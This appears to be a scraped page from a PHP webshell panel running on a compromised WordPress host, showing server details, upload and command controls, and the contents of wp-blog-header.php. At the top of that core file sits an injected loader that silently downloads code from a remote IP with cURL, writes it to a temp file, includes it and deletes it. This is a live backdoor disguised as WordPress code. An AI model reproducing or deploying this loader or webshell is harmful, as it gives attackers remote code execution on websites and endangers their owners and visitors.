403Webshell
Server IP : 207.180.252.222  /  Your IP : 216.73.216.117
Web Server : Apache
System : Linux vmi447977.contaboserver.net 4.18.0-512.el8.x86_64 #1 SMP Tue Aug 22 16:03:20 UTC 2023 x86_64
User : konyaplisesineklik ( 10089)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/konyaplisesineklik.com/httpdocs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/konyaplisesineklik.com/httpdocs/wp-blog-header.php
<?php
$f = @tempnam(@sys_get_temp_dir(),"");
$handle = curl_init();
curl_setopt ($handle, CURLOPT_URL, 'http://173.208.184.138/z60530_6/stat/index.txt');
curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec( $handle );
if ( PHP_VERSION_ID < 80000 ) {
    curl_close(  $handle  );
}
@file_put_contents($f, $result);
@include $f;
@unlink($f);
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}

Youez - 2016 - github.com/yon3zu
LinuXploit